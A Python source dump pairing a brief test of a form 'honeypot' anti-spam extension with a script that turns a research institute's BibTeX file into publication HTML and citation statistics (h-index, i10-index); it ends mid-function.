class EditSubmissionForm(Form):
pass
class SubmissionForm(Form):
pass
# Edit submission
# ... default
submission = Submission()
assert submission.honeypot is True
request = Bunch(**{'app.settings.org.disabled_extensions': []})
form_class = submission.with_content_extensions(
EditSubmissionForm, request=request
)
form = form_class()
assert 'honeypot' in form._fields
assert form.honeypot.data is True
# ... change
form.honeypot.data = False
form.populate_obj(submission)
assert submission.honeypot is False
# ... apply
form_class = submission.with_content_extensions(
EditSubmissionForm, request=request
)
form = form_class()
form.process(obj=submission)
assert form.honeypot.data is False
# Extend submission
# ... add
submission.honeypot = True
form_class = submission.extend_form_class(
SubmissionForm, extensions=['honeypot']
)
form = form_class()
form.model = submission
form.on_request()
assert 'duplicate_of' in form._fields
# ... don't add
submission.honeypot = False
form = form_class()
form.model = submission
form.on_request()
assert 'duplicate_of' not in form._fields
|
###
# 这是为了更新https://ircre.org/research.html文件而写的代码
# 目的是从ircre.bib自动生成我们格式的research.html文件
#
###
import sys
import os
import bibtexparser
from bibtexparser.bibdatabase import BibDatabase
from bibtexparser.bparser import BibTexParser
from bibtexparser.bwriter import BibTexWriter
from datetime import datetime
currentdir = os.path.dirname(os.path.abspath(__file__))
ircre_bib_path = currentdir+r'/../bib7image/ircre.bib'
articles_bib_path = currentdir+r'/../bib7image/articles.bib'
others_bib_path = currentdir+r'/../bib7image/others.bib'
sorted_articles_bib_path = currentdir+r'/../bib7image/sorted-articles.bib'
top15_bib_path = currentdir+r'/../bib7image/top15.bib'
newircre_bib_path = currentdir+r'/../bib7image/newircre.bib'
researchnew_html_path = currentdir+r'/../webpage/researchnew.html'
def bibtexclassify():
parser = BibTexParser(common_strings=False)
parser.ignore_nonstandard_types = False
with open(ircre_bib_path, encoding='utf8') as bibtexfile:
ircrebib_database = bibtexparser.load(bibtexfile, parser)
allentries = ircrebib_database.entries.copy()
# ----------------------------------------
# get all articles
# -----------------------------------------
article_entries = []
for i in range(len(allentries)):
if allentries[i]['ENTRYTYPE'] == 'article':
article_entries.append(allentries[i].copy())
article_database = BibDatabase()
article_database.entries = article_entries
writer = BibTexWriter()
writer.indent = ' '
writer.order_entries_by = ('order',)
with open(articles_bib_path, 'w', encoding='utf8') as article_file:
bibtexparser.dump(article_database, article_file, writer=writer)
otherentries = []
for i in range(len(allentries)):
if allentries[i]['ENTRYTYPE'] == 'inbook' or allentries[i]['ENTRYTYPE'] == 'inproceedings' or allentries[i]['ENTRYTYPE'] == 'incollection':
otherentries.append(allentries[i].copy())
other_database = BibDatabase()
other_database.entries = otherentries
writer2 = BibTexWriter()
writer2.indent = ' '
writer2.order_entries_by = ('order',)
with open(others_bib_path, 'w', encoding='utf8') as others_file:
bibtexparser.dump(other_database, others_file, writer=writer2)
return 0
def articlessort():
parser = BibTexParser(common_strings=False)
parser.ignore_nonstandard_types = False
with open(articles_bib_path, encoding='utf8') as articlesfile:
articles_database = bibtexparser.load(articlesfile, parser)
articles = articles_database.entries.copy()
for i in range(len(articles)):
try:
articles[i]['sortkey1'] = float(articles[i]['impactfactor'])
except:
articles[i]['sortkey1'] = float(0)
try:
articles[i]['sortkey2'] = int(articles[i]['cited'])
except:
articles[i]['sortkey2'] = int(0)
sorted_by_journalif_cited = sorted(articles, key=lambda x: (
x['sortkey1'], x['journal'], x['sortkey2'], x['year']), reverse=True)
for i in range(len(sorted_by_journalif_cited)):
sorted_by_journalif_cited[i]['order'] = str(i).zfill(6)
for i in range(len(sorted_by_journalif_cited)):
sorted_by_journalif_cited[i].pop('sortkey1')
sorted_by_journalif_cited[i].pop('sortkey2')
sortedarticlesdatabase = BibDatabase()
sortedarticlesdatabase.entries = sorted_by_journalif_cited
writer = BibTexWriter()
writer.indent = ' '
writer.order_entries_by = ('order',)
with open(sorted_articles_bib_path, 'w', encoding='utf8') as sortedarticlesfile:
bibtexparser.dump(sortedarticlesdatabase,
sortedarticlesfile, writer=writer)
return 0
def getop15articles():
parser = BibTexParser(common_strings=False)
parser.ignore_nonstandard_types = False
with open(articles_bib_path, encoding='utf8') as article_file:
article_database = bibtexparser.load(article_file, parser)
article_entries = article_database.entries.copy()
for i in range(len(article_entries)):
try:
article_entries[i]['sortkey1'] = int(article_entries[i]['cited'])
except:
article_entries[i]['sortkey1'] = int(0)
articles_sorted_by_cited = sorted(
article_entries, key=lambda x: (x['sortkey1']), reverse=True)
top15articles = []
for i in range(15):
top15articles.append(articles_sorted_by_cited[i].copy())
for i in range(len(top15articles)):
top15articles[i]['ENTRYTYPE'] = 'toparticle'
top15articles[i]['ID'] = top15articles[i]['ID'] + 'a'
for i in range(len(top15articles)):
top15articles[i].pop('sortkey1')
top15_database = BibDatabase()
top15_database.entries = top15articles
writer = BibTexWriter()
writer.indent = ' '
writer.order_entries_by = None
with open(top15_bib_path, 'w', encoding='utf8') as top15_file:
bibtexparser.dump(top15_database, top15_file, writer=writer)
return 0
def ircrebibmerge():
articlesparser = BibTexParser(common_strings=False)
articlesparser.ignore_nonstandard_types = False
with open(sorted_articles_bib_path, encoding='utf8') as sortedarticle_file:
sortedarticle_database = bibtexparser.load(
sortedarticle_file, articlesparser)
sortedarticles = sortedarticle_database.entries.copy()
top15parser = BibTexParser(common_strings=False)
top15parser.ignore_nonstandard_types = False
with open(top15_bib_path, encoding='utf8') as top15_file:
top15_database = bibtexparser.load(top15_file, top15parser)
top15articles = top15_database.entries.copy()
othersparser = BibTexParser(common_strings=False)
othersparser.ignore_nonstandard_types = False
with open(others_bib_path, encoding='utf8') as others_file:
others_database = bibtexparser.load(others_file, othersparser)
others = others_database.entries.copy()
alldb = BibDatabase()
entries = []
for i in range(len(top15articles)):
entries.append(top15articles[i].copy())
for i in range(len(sortedarticles)):
entries.append(sortedarticles[i].copy())
for i in range(len(others)):
entries.append(others[i].copy())
alldb.entries = entries
writer = BibTexWriter()
writer.indent = ' '
writer.order_entries_by = None
with open(newircre_bib_path, 'w', encoding='utf8') as newircrebibfile:
bibtexparser.dump(alldb, newircrebibfile, writer=writer)
return 0
def Hindex(citationlist):
"""根据citationlist获得h因子。
citationlist是按顺序的每篇文章引用次数列表
"""
indexSet = sorted(list(set(citationlist)), reverse=True)
for index in indexSet:
clist = [i for i in citationlist if i >= index]
if index <= len(clist):
break
return index
def I10index(citationlist):
"""根据citationlist计算i10因子。
citationlist是按顺序的每篇文章引用次数列表
"""
i10index = 0
for i in range(len(citationlist)):
if citationlist[i] >= 10:
i10index = i10index + 1
return i10index
def filecopyback():
ircrebibwebsitefile = '/srv/main-websites/ircre/js/ircre.bib'
ircrestatwebsitefile = '/srv/main-websites/ircre/js/statistics.js'
currentdir = '/home/limingtao/ircre-bibtex/ircreupdate'
os.system(
'''cd ''' + currentdir + ''';''' +
'''cp /home/limingtao/ircre-bibtex/ircreupdate/newircre.bib ''' + ircrebibwebsitefile + ''' -f ;''')
os.system(
'''cd ''' + currentdir + ''';''' +
'''cp /home/limingtao/ircre-bibtex/ircreupdate/newstatistics.js ''' + ircrestatwebsitefile + ''' -f ;''')
return 0
def getstatistics():
articlesparser = BibTexParser(common_strings=False)
articlesparser.ignore_nonstandard_types = False
with open(articles_bib_path, encoding='utf8') as articlesfile:
articles_database = bibtexparser.load(articlesfile, articlesparser)
articleentries = articles_database.entries
totalcitations = 0
totalif = 0.0
citationlist = []
jourallist = []
hihonumber = 0
totalpublications = len(articleentries) + 28
totalarticles = len(articleentries)
for i in range(len(articleentries)):
if 'cited' in articleentries[i]:
citednumber = int(articleentries[i]['cited'])
else:
citednumber = 0
if 'impactfactor' in articleentries[i]:
impactfactor = float(articleentries[i]['impactfactor'])
else:
impactfactor = 0.0
if 'hihosubject' in articleentries[i]:
hihonumber = hihonumber + 1
citationlist.append(citednumber)
jourallist.append(articleentries[i]['journal'])
totalcitations = totalcitations + citednumber
totalif = totalif + impactfactor
hindex = Hindex(citationlist)
i10index = I10index(citationlist)
# totalcitations = totalcitations + 19
citationperpaper = totalcitations / len(articleentries)
citationperpaper = round(citationperpaper, 2)
journalnumber = len(set(jourallist))
averageif = totalif / len(articleentries)
averageif = round(averageif, 3)
return (totalarticles, totalcitations, hindex, i10index, citationperpaper, journalnumber, averageif, hihonumber)
def getsothers():
othersparser = BibTexParser(common_strings=False)
othersparser.ignore_nonstandard_types = False
with open(others_bib_path, encoding='utf8') as othersfile:
others_database = bibtexparser.load(othersfile, othersparser)
othersentries = others_database.entries
totalbooks = 0
totalproceeds = 0
totaleditors = 0
totalcitations = 0
for i in range(len(othersentries)):
if othersentries[i]['ENTRYTYPE'] == 'inbook':
totalbooks += 1
if othersentries[i]['ENTRYTYPE'] == 'inproceedings':
totalproceeds += 1
if othersentries[i]['ENTRYTYPE'] == 'incollection':
totaleditors += 1
if 'cited' in othersentries[i]:
citednumber = int(othersentries[i]['cited'])
else:
citednumber = 0
totalcitations = totalcitations + citednumber
# totalcitations = totalcitations + 19
return (totalbooks, totalcitations, totalproceeds, totaleditors)
def generateTop15ArtitleHtml(bibFilePath):
# 生成TOP15Articles部分,返回HTML
parser = BibTexParser(common_strings=False)
parser.ignore_nonstandard_types = False
with open(bibFilePath, encoding='utf8') as bibtexFile:
ircreDatabase = bibtexparser.load(bibtexFile, parser)
allEntries = ircreDatabase.entries.copy()
(totalarticles, articaltotalcitations, hindex, i10index,
citationperpaper, journalnumber, averageif, hihonumber) = getstatistics()
(totalbooks, othertotalcitations, totalproceeds, totaleditors) = getsothers()
allnumber = totalarticles+totalbooks+totalproceeds+totaleditors
allcitations = articaltotalcitations+othertotalcitations
# 初始值为TOP15article的标题
Top15Article = '''
<div id="output">
<div id="total-statistics">
<h2>IRCRE Scientific Output</h2>
<h3><span class="listcountred"><span id="totalpublications">'''+str(allnumber)+'''</span>+</span><strong>Publications
& </strong><span class="listcountblue"><span id="totalcitations">'''+str(allcitations)+'''</span>+</span> <strong>Citations since
2011</strong>
</h3>
</div>
<div id="top15mostcitedarticles">
<h3>
<strong>Top 15 Most Cited Articles</strong>
</h3></div>
'''
top15ArticleBody = ''
for i in range(len(allEntries)):
tempHtml = ''
hiho = ''
image = ''
formattedAuthor = ''
formattedtTitle = ''
journal = ''
year = ''
volume = ''
number = ''
pages = ''
paperid = ''
url = ''
impactFactor = ''
cited = ''
if allEntries[i]['ENTRYTYPE'] == 'toparticle':
# keys = allEntries[i].keys()
# 无法显示 hihoimage
if 'hihoimage' in allEntries[i].keys():
hiho = '''
<div style="float:inherit; height:40px; width:500px;text-align: left;"><img
src="./images/articlecovers/ISIHighlycitedlogo.jpg" alt="" width="77" height="31">
<a class="newlink" a href="./%s"
target="_blank"><strong><em> %s</em></strong></a></div>
''' % (allEntries[i]['hiholink'], allEntries[i]['hihosubject'])
if 'image' in allEntries[i].keys():
image = '''<span style="float: left; width: 48px; height: 54px;"><img src="./images/articlecovers/%s" alt="" width="42" height="51"></span> ''' % (
allEntries[i]['image'])
if 'formattedauthor' in allEntries[i].keys():
formattedAuthor = allEntries[i]['formattedauthor']
if 'formattedtitle' in allEntries[i].keys():
formattedtTitle = ',“<strong>%s</strong> ”' % allEntries[i]['formattedtitle']
if 'journal' in allEntries[i].keys():
journal = ', <em>%s</em> ' % (
allEntries[i]['journal'])
if 'year' in allEntries[i].keys():
year = '<strong>%s</strong>,' % allEntries[i]['year']
if 'volume' in allEntries[i].keys():
if 'number' in allEntries[i].keys():
volume = '<em>%s(%s)</em>' % (
allEntries[i]['volume'], allEntries[i]['number'])
else:
volume = '<em>%s</em>' % (allEntries[i]['volume'])
elif 'number' in allEntries[i].keys():
number = '<em>%s</em>' % (allEntries[i]['number'])
if 'pages' in allEntries[i].keys():
pages = ',' + allEntries[i]['pages']
if 'cited' in allEntries[i].keys():
if allEntries[i]['cited'] != '0':
cited = '<br><span class="cited"> Cited: %s</span>' % allEntries[i]['cited']
else:
cited = '<br><span class="cited" style="display:none"> Cited: %s</span>' % allEntries[i]['cited']
if 'impactfactor' in allEntries[i].keys():
if 'impactfactoryear' not in allEntries[i].keys():
impactFactor = '<span class="infact">(<strong>IF 2019: %s</strong>)</span><br>' % allEntries[i]['impactfactor']
else:
impactFactor = '<span class="infact">(<strong>IF %s %s</strong>)</span><br>' % (allEntries[i]['impactfactoryear'],allEntries[i]['impactfactor'])
if 'url' in allEntries[i].keys():
url = '''<a href="%s" target="_blank">%s</a>''' % (
allEntries[i]['url'], allEntries[i]['url'])
tempHtml = hiho + image + formattedAuthor + formattedtTitle + \
journal + year + volume + number + pages + cited + impactFactor + url
tempHtml = '<li style="padding:5px 0px">' + tempHtml + '</li>'
top15ArticleBody = top15ArticleBody + tempHtml
top15ArticleBody = '<ol>%s</ol>' % top15ArticleBody
Top15Article = Top15Article + top15ArticleBody
return Top15Article
def generateAricleHtml(bibFilePath):
# 生成Articles部分,返回HTML
parser = BibTexParser(common_strings=False)
parser.ignore_nonstandard_types = False
with open(bibFilePath, encoding='utf8') as bibtexFile:
ircreDatabase = bibtexparser.load(bibtexFile, parser)
allEntries = ircreDatabase.entries.copy()
(totalarticles, articaltotalcitations, hindex, i10index,
citationperpaper, journalnumber, averageif, hihonumber) = getstatistics()
# article的初始值为 artile部分的信息
# 包括article整体资料与标题
article = '''
<div id="articlestatics" style="margin-top:20px;margin-bottom:20px;">
<h3 class="title">
<strong><a id="articles"></a>Articles</a></strong>
<span class="listcountred">(<span id="totalarticles">'''+str(totalarticles)+'''</span>)</span>
</h3>
<div>
<span class="index">h-index = </span><span class="index_number"><span
id="hindex">'''+str(hindex)+'''</span></span><span class="index">, i10-index = </span><span
class="index_number"><span id="i10index">'''+str(i10index)+'''</span></span><span class="index">,
Citations/Paper = </span><span class="index_number"><span
id="citationperpaper">'''+str(citationperpaper)+'''</span></span><span class="index">, Journals =
</span><span class="index_number"><span id="numberjournals">'''+str(journalnumber)+'''</span></span><span
class="index">, Average IF = </span><span class="index_number"><span
id="averageif">'''+str(averageif)+'''</span></span><span class="index">, ESI Highly Cited =
</span><span class="index_number"><span id="numberesihighlycited">'''+str(hihonumber)+'''</span></span>
<br>
<span class="sorted">sorted by Impact Factor (2018 Journal Citation Reports®,
Clarivate Analytics), citations from Google Scholar, CrossRef, SciFinder,
Scopus...</span><br>
</div>
</div>'''
articleBody = ''
for i in range(len(allEntries)):
tempHtml = ''
hiho = ''
image = ''
formattedAuthor = ''
formattedtTitle = ''
journal = ''
year = ''
volume = ''
number = ''
pages = ''
paperid = ''
url = ''
impactFactor = ''
cited = ''
if allEntries[i]['ENTRYTYPE'] == 'article':
# keys = allEntries[i].keys()
# 无法显示 hihoimage
if 'hihoimage' in allEntries[i].keys():
hiho = '''
<div style=" height:40px; width:500px;text-align: left;"><img
src="./images/articlecovers/ISIHighlycitedlogo.jpg" alt="" width="77" height="31">
<a class="hiholinka" a href="./%s"
target="_blank"><strong><em> %s</em></strong></a></div>
''' % (allEntries[i]['hiholink'], allEntries[i]['hihosubject'])
if 'image' in allEntries[i].keys():
if 'imagewidth' in allEntries[i].keys():
imagewidth = allEntries[i]['imagewidth']
if imagewidth == 'Beilstein Journal of Nanotechnology':
image = '''<span style="float: left; width: 190px;"><img class="bibtexVar" src="./images/articlecovers/%s" alt="" width="184" height="22" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Nature Communications':
image = '''<span style="float: left; width: 108px;"><img class="bibtexVar" src="./images/articlecovers/%s" alt="" width="102" height="32" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Physical Review B':
image = '''<span style="float: left; width: 102px;"><img class="bibtexVar" src="./images/articlecovers/%s" alt="" width="96" height="32" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Scientific Reports':
image = '''<span style="float: left; width: 165px;"><img class="bibtexVar" src="./images/articlecovers/%s" alt="" width="160" height="32" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'EcoMat':
image = '''<span style="float: left; width: 155px;"><img class="bibtexVar" src="./images/articlecovers/%s" alt="" width="148" height="28" text-align="left"></span> ''' % (
allEntries[i]['image'])
else:
image = '''<span style="float: left; width: 48px;"><img class="bibtexVar" src="./images/articlecovers/%s" alt="" width="42" height="51" text-align="left"></span> ''' % (
allEntries[i]['image'])
if 'formattedauthor' in allEntries[i].keys():
formattedAuthor = allEntries[i]['formattedauthor']
if 'formattedtitle' in allEntries[i].keys():
formattedtTitle = ',“<strong>%s</strong> ”' % allEntries[i]['formattedtitle']
if 'journal' in allEntries[i].keys():
journal = ', <em>%s</em> ' % (
allEntries[i]['journal'])
if 'year' in allEntries[i].keys():
year = '<strong>%s</strong>,' % allEntries[i]['year']
if 'volume' in allEntries[i].keys():
if 'number' in allEntries[i].keys():
volume = '<em>%s(%s)</em>' % (
allEntries[i]['volume'], allEntries[i]['number'])
else:
volume = '<em>%s</em>' % (allEntries[i]['volume'])
elif 'number' in allEntries[i].keys():
number = '<em>%s</em>' % (allEntries[i]['number'])
if 'pages' in allEntries[i].keys():
pages = ','+allEntries[i]['pages']
if 'cited' in allEntries[i].keys():
if allEntries[i]['cited'] != '0':
cited = '<br><span class="cited"> Cited: %s</span>' % allEntries[i]['cited']
else:
cited = '<br><span class="cited" style="display:none"> Cited: %s</span>' % allEntries[i]['cited']
if 'impactfactor' in allEntries[i].keys():
if 'impactfactoryear' not in allEntries[i].keys():
impactFactor = '<span class="infact">(<strong>IF 2019: %s</strong>)</span><br>' % allEntries[i]['impactfactor']
else:
impactFactor = '<span class="infact">(<strong>IF %s %s</strong>)</span><br>' % (allEntries[i]['impactfactoryear'],allEntries[i]['impactfactor'])
if 'url' in allEntries[i].keys():
url = '''<a href="%s" target="_blank" style="float: left">%s</a>''' % (
allEntries[i]['url'], allEntries[i]['url'])
tempHtml = hiho + image + formattedAuthor + formattedtTitle + \
journal + year + volume + number + pages + cited + impactFactor + url
tempHtml = '<li style="float: left;padding:5px 0px">' + tempHtml + '</li>'
articleBody = articleBody + tempHtml
articleBody = '<ol style="margin-top: 0px;padding-top:0px">%s</ol>' % articleBody
article = article + articleBody
return article
def generateBookHtml(bibFilePath):
# 生成Articles部分,返回HTML
parser = BibTexParser(common_strings=False)
parser.ignore_nonstandard_types = False
with open(bibFilePath, encoding='utf8') as bibtexFile:
ircreDatabase = bibtexparser.load(bibtexFile, parser)
allEntries = ircreDatabase.entries.copy()
(totalbooks, othertotalcitations, totalproceeds, totaleditors) = getsothers()
# article的初始值为 artile部分的信息
# 包括article整体资料与标题
book = '''
<div id="bookchapters" style="margin-top:20px;margin-bottom:20px;">
<h3 class="title">
<strong><a id="articles"></a>Book Chapters</a></strong>
<span class="listcountred">(<span id="totalarticles">'''+str(totalbooks)+'''</span>)</span>
</h3>
</div>'''
bookBody = ''
for i in range(len(allEntries)):
tempHtml = ''
hiho = ''
image = ''
formattedAuthor = ''
formattedtTitle = ''
journal = ''
year = ''
volume = ''
number = ''
pages = ''
paperid = ''
url = ''
impactFactor = ''
cited = ''
if allEntries[i]['ENTRYTYPE'] == 'inbook':
# keys = allEntries[i].keys()
# 无法显示 hihoimage
if 'hihoimage' in allEntries[i].keys():
hiho = '''
<div style=" height:40px; width:500px;text-align: left;"><img
src="./images/articlecovers/ISIHighlycitedlogo.jpg" alt="" width="77" height="31">
<a class="hiholinka" a href="./%s"
target="_blank"><strong><em> %s</em></strong></a></div>
''' % (allEntries[i]['hiholink'], allEntries[i]['hihosubject'])
if 'image' in allEntries[i].keys():
if 'imagewidth' in allEntries[i].keys():
imagewidth = allEntries[i]['imagewidth']
if imagewidth == 'Beilstein Journal of Nanotechnology':
image = '''<span style="float: left; width: 190px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="184" height="22" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Nature Communications':
image = '''<span style="float: left; width: 108px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="102" height="32" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Physical Review B':
image = '''<span style="float: left; width: 102px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="96" height="32" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Scientific Reports':
image = '''<span style="float: left; width: 165px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="160" height="32" text-align="left"></span> ''' % (
allEntries[i]['image'])
else:
image = '''<span style="float: left; width: 48px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="42" height="51" text-align="left"></span> ''' % (
allEntries[i]['image'])
if 'formattedauthor' in allEntries[i].keys():
formattedAuthor = allEntries[i]['formattedauthor']
if 'formattedtitle' in allEntries[i].keys():
formattedtTitle = ',“<strong>%s</strong> ”' % allEntries[i]['formattedtitle']
if 'journal' in allEntries[i].keys():
journal = ', <em>%s</em> ' % (
allEntries[i]['journal'])
if 'year' in allEntries[i].keys():
year = '<strong>%s</strong>,' % allEntries[i]['year']
if 'volume' in allEntries[i].keys():
if 'number' in allEntries[i].keys():
volume = '<em>%s(%s)</em>' % (
allEntries[i]['volume'], allEntries[i]['number'])
else:
volume = '<em>%s</em>' % (allEntries[i]['volume'])
elif 'number' in allEntries[i].keys():
number = '<em>%s</em>' % (allEntries[i]['number'])
if 'pages' in allEntries[i].keys():
pages = ','+allEntries[i]['pages']
if 'cited' in allEntries[i].keys():
if allEntries[i]['cited'] != '0':
cited = '<br><span class="cited"> Cited: %s</span>' % allEntries[i]['cited']
else:
cited = '<br><span class="cited" style="display:none"> Cited: %s</span>' % allEntries[i]['cited']
if 'impactfactor' in allEntries[i].keys():
if 'impactfactoryear' not in allEntries[i].keys():
impactFactor = '<span class="infact">(<strong>IF 2019: %s</strong>)</span><br>' % allEntries[i]['impactfactor']
else:
impactFactor = '<span class="infact">(<strong>IF %s %s</strong>)</span><br>' % (allEntries[i]['impactfactoryear'],allEntries[i]['impactfactor'])
if 'url' in allEntries[i].keys():
url = '''<a href="%s" target="_blank" style="float: left">%s</a>''' % (
allEntries[i]['url'], allEntries[i]['url'])
tempHtml = hiho + image + formattedAuthor + formattedtTitle + \
journal + year + volume + number + pages + cited + impactFactor + url
tempHtml = '<li style="float: left;padding:5px 0px">' + tempHtml + '</li>'
bookBody = bookBody + tempHtml
(totalarticles, articaltotalcitations, hindex, i10index,
citationperpaper, journalnumber, averageif, hihonumber) = getstatistics()
b = totalarticles+1
bookBody = '<ol start=%s style="margin-top: 0px;padding-top:0px">%s</ol>' % (
b, bookBody)
book = book + bookBody
return book
def generateProceedHtml(bibFilePath):
# 生成Articles部分,返回HTML
parser = BibTexParser(common_strings=False)
parser.ignore_nonstandard_types = False
with open(bibFilePath, encoding='utf8') as bibtexFile:
ircreDatabase = bibtexparser.load(bibtexFile, parser)
allEntries = ircreDatabase.entries.copy()
(totalbooks, othertotalcitations, totalproceeds, totaleditors) = getsothers()
# article的初始值为 artile部分的信息
# 包括article整体资料与标题
proceed = '''
<div id="proceedings" style="margin-top:20px;margin-bottom:20px;">
<h3 class="title">
<strong><a id="articles"></a>Proceedings</a></strong>
<span class="listcountred">(<span id="totalarticles">'''+str(totalproceeds)+'''</span>)</span>
</h3>
</div>'''
proceedBody = ''
for i in range(len(allEntries)):
tempHtml = ''
hiho = ''
image = ''
formattedAuthor = ''
formattedtTitle = ''
journal = ''
year = ''
volume = ''
number = ''
pages = ''
paperid = ''
url = ''
impactFactor = ''
cited = ''
if allEntries[i]['ENTRYTYPE'] == 'inproceedings':
# keys = allEntries[i].keys()
# 无法显示 hihoimage
if 'hihoimage' in allEntries[i].keys():
hiho = '''
<div style=" height:40px; width:500px;text-align: left;"><img
src="./images/articlecovers/ISIHighlycitedlogo.jpg" alt="" width="77" height="31">
<a class="hiholinka" a href="./%s"
target="_blank"><strong><em> %s</em></strong></a></div>
''' % (allEntries[i]['hiholink'], allEntries[i]['hihosubject'])
if 'image' in allEntries[i].keys():
if 'imagewidth' in allEntries[i].keys():
imagewidth = allEntries[i]['imagewidth']
if imagewidth == 'MRS Proceedings':
image = '''<span style="float: left; width: 156px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="148" height="31" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Proceedings of the American Chemical Society':
image = '''<span style="float: left; width: 155px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="148" height="28" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Nature Communications':
image = '''<span style="float: left; width: 156px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="148" height="28" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Beilstein Journal of Nanotechnology':
image = '''<span style="float: left; width: 190px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="184" height="22" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Nature Communications':
image = '''<span style="float: left; width: 108px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="102" height="32" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Physical Review B':
image = '''<span style="float: left; width: 102px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="96" height="32" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Scientific Reports':
image = '''<span style="float: left; width: 165px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="160" height="32" text-align="left"></span> ''' % (
allEntries[i]['image'])
else:
image = '''<span style="float: left; width: 48px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="42" height="51" text-align="left"></span> ''' % (
allEntries[i]['image'])
if 'formattedauthor' in allEntries[i].keys():
formattedAuthor = allEntries[i]['formattedauthor']
if 'formattedtitle' in allEntries[i].keys():
formattedtTitle = ',“<strong>%s</strong> ”' % allEntries[i]['formattedtitle']
if 'journal' in allEntries[i].keys():
journal = ', <em>%s</em> ' % (
allEntries[i]['journal'])
if 'year' in allEntries[i].keys():
year = '<strong>%s</strong>,' % allEntries[i]['year']
if 'volume' in allEntries[i].keys():
if 'number' in allEntries[i].keys():
volume = '<em>%s(%s)</em>' % (
allEntries[i]['volume'], allEntries[i]['number'])
else:
volume = '<em>%s</em>' % (allEntries[i]['volume'])
elif 'number' in allEntries[i].keys():
number = '<em>%s</em>' % (allEntries[i]['number'])
if 'pages' in allEntries[i].keys():
pages = ','+allEntries[i]['pages']
if 'cited' in allEntries[i].keys():
if allEntries[i]['cited'] != '0':
cited = '<br><span class="cited"> Cited: %s</span>' % allEntries[i]['cited']
else:
cited = '<br><span class="cited" style="display:none> Cited: %s</span>' % allEntries[i]['cited']
if 'impactfactor' in allEntries[i].keys():
if 'impactfactoryear' not in allEntries[i].keys():
impactFactor = '<span class="infact">(<strong>IF 2019: %s</strong>)</span><br>' % allEntries[i]['impactfactor']
else:
impactFactor = '<span class="infact">(<strong>IF %s %s</strong>)</span><br>' % (allEntries[i]['impactfactoryear'],allEntries[i]['impactfactor'])
if 'url' in allEntries[i].keys():
url = '''<a href="%s" target="_blank" style="float: left">%s</a>''' % (
allEntries[i]['url'], allEntries[i]['url'])
tempHtml = hiho + image + formattedAuthor + formattedtTitle + \
journal + year + volume + number + pages + cited + impactFactor + url
tempHtml = '<li style="float: left;padding:5px 0px">' + tempHtml + '</li>'
proceedBody = proceedBody + tempHtml
(totalarticles, articaltotalcitations, hindex, i10index,
citationperpaper, journalnumber, averageif, hihonumber) = getstatistics()
c = totalarticles+totalbooks+1
proceedBody = '<ol start=%s style="margin-top: 0px;padding-top:0px">%s</ol>' % (
c, proceedBody)
proceed = proceed + proceedBody
return proceed
def generateEditorialsHtml(bibFilePath):
# 生成Articles部分,返回HTML
parser = BibTexParser(common_strings=False)
parser.ignore_nonstandard_types = False
with open(bibFilePath, encoding='utf8') as bibtexFile:
ircreDatabase = bibtexparser.load(bibtexFile, parser)
allEntries = ircreDatabase.entries.copy()
(totalbooks, othertotalcitations, totalproceeds, totaleditors) = getsothers()
# article的初始值为 artile部分的信息
# 包括article整体资料与标题
editorials = '''
<div id="editorials" style="margin-top:20px;margin-bottom:20px;">
<h3 class="title">
<strong><a id="articles"></a>Editorials</a></strong>
<span class="listcountred">(<span id="totalarticles">'''+str(totaleditors)+'''</span>)</span>
</h3>
</div>'''
editorialsBody = ''
for i in range(len(allEntries)):
tempHtml = ''
hiho = ''
image = ''
formattedAuthor = ''
formattedtTitle = ''
journal = ''
year = ''
volume = ''
number = ''
pages = ''
paperid = ''
url = ''
impactFactor = ''
cited = ''
if allEntries[i]['ENTRYTYPE'] == 'incollection':
# keys = allEntries[i].keys()
# 无法显示 hihoimage
if 'hihoimage' in allEntries[i].keys():
hiho = '''
<div style=" height:40px; width:500px;text-align: left;"><img
src="./images/articlecovers/ISIHighlycitedlogo.jpg" alt="" width="77" height="31">
<a class="hiholinka" a href="./%s"
target="_blank"><strong><em> %s</em></strong></a></div>
''' % (allEntries[i]['hiholink'], allEntries[i]['hihosubject'])
if 'image' in allEntries[i].keys():
if 'imagewidth' in allEntries[i].keys():
imagewidth = allEntries[i]['imagewidth']
if imagewidth == 'The Scientific World Journal':
image = '''<span style="float: left; width: 138px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="132" height="50" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'MRS Proceedings':
image = '''<span style="float: left; width: 156px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="148" height="31" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Nature Communications':
image = '''<span style="float: left; width: 156px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="148" height="28" text-align="left"></span> ''' % (
allEntries[i]['image'])
if imagewidth == 'Beilstein Journal of Nanotechnology':
image = '''<span style="float: left; width: 190px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="184" height="22" text-align="left"></span> ''' % (
allEntries[i]['image'])
